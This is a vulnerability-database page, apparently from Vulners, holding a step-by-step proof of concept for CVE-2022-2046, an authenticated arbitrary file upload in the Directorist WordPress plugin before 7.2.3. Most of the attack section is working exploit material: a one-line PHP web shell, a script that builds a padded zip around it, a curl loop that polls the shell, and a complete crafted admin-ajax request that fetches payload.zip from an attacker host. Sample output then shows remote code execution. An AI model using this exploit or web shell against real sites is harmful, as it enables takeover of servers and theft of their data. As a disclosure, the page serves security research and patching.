Lucene search
+L

Directorist - Business Directory Plugin < 7.2.3 - Admin+ Arbitrary File Upload

🗓️ 18 Jul 2022 00:00:00Reported by Rafie Muhammad (Yeraisci)Type 
wpexploit
 wpexploit
👁 148 Views

< 7.2.3 Admin+ Arbitrary File Upload via Crafted HTTP Reques

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2022-2046
8 Aug 202214:15
attackerkb
cnnvd
CNNVD
WordPress Plugin Discy 代码问题漏洞
8 Aug 202200:00
cnnvd
cve
CVE
CVE-2022-2046
8 Aug 202213:46
cve
cvelist
Cvelist
CVE-2022-2046 Directorist - Business Directory Plugin < 7.2.3 - Admin+ Arbitrary File Upload
8 Aug 202213:46
cvelist
euvd
EUVD
EUVD-2022-34349
3 Oct 202520:07
euvd
nvd
NVD
CVE-2022-2046
8 Aug 202214:15
nvd
patchstack
Patchstack
WordPress Directorist plugin <= 7.2.2 - Authenticated Arbitrary File Upload vulnerability
18 Jul 202200:00
patchstack
prion
Prion
Code injection
8 Aug 202214:15
prion
ptsecurity
Positive Technologies
PT-2022-14679 · WordPress · Directorist
8 Aug 202200:00
ptsecurity
redhatcve
RedhatCVE
CVE-2022-2046
22 May 202522:20
redhatcve
Rows per page
1. Craft a custom zip file
-------bash
echo "<?php echo shell_exec($_REQUEST['c']); ?>" > dummy_shell.php

for i in `seq 1 10000`; do 
    echo $RANDOM | md5sum | head -c 30 > "dummy_$i.txt"
done

zip -qqr "payload.zip" dummy_*
-------bash

2. Create a bash script that will try to hit the shell on a while loop
-------bash
#!/bin/sh

while true; do
    code=$(curl -s -w "%{http_code}" -o result "http://<wp_site>/wp-content/plugins/atbdp-temp-dir/dummy_shell.php?c=id")
    if [ $code -eq 200 ]; then
	echo ""
	echo "RCE sucess"
        cat result
        break
    fi
    echo -n "."
done
-------bash

3. Execute the bash script on step 2 

4. Login as WP admin and send this crafted HTTP request
-------httprequest
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 750
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary221I9lesLluZJPEm
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fsrv%2Fwww%2Fwordpress%2Fwp-content%2Fuploads%2F2022%2F05%2Flistings-export-data.txt&delimiter=%2C
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [Replace with Admin+ cookie]
Connection: close

------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="action"

atbdp_download_file
------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="download_item[download_link]"

https://<attacker_site>/payload.zip
------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="download_item[skip_licencing]"

true
------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="download_item[permalink]"

true
------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="nonce"

< as admin, go to http://<wp_domain>/wp-admin/edit.php?post_type=at_biz_dir and search string 'atbdp_admin_data = {"nonce":' and get the nonce value after the searched string>
------WebKitFormBoundary221I9lesLluZJPEm
Content-Disposition: form-data; name="type"

plugin
------WebKitFormBoundary221I9lesLluZJPEm--

-------httprequest

5. We will see the output from the bash script that we executed earlier will output the "id" command result from the targeted WP site . Example :
..................................................................
RCE sucess
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation